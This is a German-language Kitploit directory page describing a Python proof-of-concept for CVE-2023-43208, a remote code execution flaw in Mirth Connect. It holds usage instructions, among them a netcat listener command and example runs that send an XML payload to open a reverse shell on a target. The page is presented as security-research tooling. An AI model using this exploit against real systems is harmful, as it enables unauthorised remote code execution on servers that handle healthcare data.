Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2023-43208 — PoC for CVE-2023-43208 RCE exploitation. | Kitploit
Tools/GitHubGitHub/predyy/cve-2023-43208
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRed Teaming
GitHubpredyy/cve-2023-43208

CVE-2023-43208

PoC for CVE-2023-43208 RCE exploitation.

Repository anzeigen
11vor 5 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2023-43208 Mirth Connect RCE PoC

Proof-of-Concept Python-Skript, das auf CVE-2023-43208 in Mirth Connect abzielt.

Haftungsausschluss

Verwenden Sie dieses Skript nur in Umgebungen, die Ihnen gehören oder für die Sie ausdrücklich autorisiert sind. Dieses Repository dient der Sicherheitsforschung, Validierung und defensiven Tests. Der Autor übernimmt keine Verantwortung für Missbrauch oder Schäden, die durch dieses Tool verursacht werden.

Übersicht

exp.py ist eine minimal abhängige Version des PoC, die:

  • Erkennt, ob ein Ziel wie eine Mirth Connect-Instanz aussieht
  • Fordert die Mirth Connect-Version von /api/server/version an
  • Prüft, ob die Version niedriger als 4.4.1 ist
  • Sendet eine XML-Nutzlast an /api/users, wenn das Ziel angreifbar erscheint

Das Skript verwendet standardmäßig HTTPS und kann mit --http auf HTTP umgestellt werden.

Verwendung

root@kitploit:~
python3 exp.py -u <target> -lh <listener_host> -lp <listener_port> [--http]

Argumente

  • -u, --url: Ziel-Mirth-Connect-URL oder -Host
  • -lh, --lhost: Lokaler Host/IP für die Reverse-Verbindung
  • -lp, --lport: Lokaler Listening-Port
  • --http: HTTP statt HTTPS erzwingen (Standard ist HTTPS)

Beispiel

Starten Sie zuerst einen Listener:

root@kitploit:~
nc -lvnp 4444

Führen Sie das Skript aus:

root@kitploit:~
python3 exp.py -u https://target.example.com -lh 192.168.1.10 -lp 4444

Für ein reines HTTP-Ziel:

root@kitploit:~
python3 exp.py -u target.example.com -lh 192.168.1.10 -lp 4444 --http

Hinweise

  • Die SSL-Zertifikatsprüfung ist im Skript deaktiviert.
  • Das Skript fragt vor dem Senden der Nutzlast nach Bestätigung.
  • Die Versionserkennung basiert auf semantischem Vergleich mit 4.4.1.
  • Ein Ziel, das als Mirth Connect erkannt wird, ist nicht zwangsläufig ausnutzbar (Netzwerk-, Umgebungs- und Laufzeitunterschiede können die Ergebnisse beeinflussen).

Credits

  • Ursprüngliche Schwachstellenentdeckung: IHTeam
  • Originalcode: K3ysTr0K3R und Chocapikk
  • Version mit minimalen Abhängigkeiten: predyy
Tool herunterladen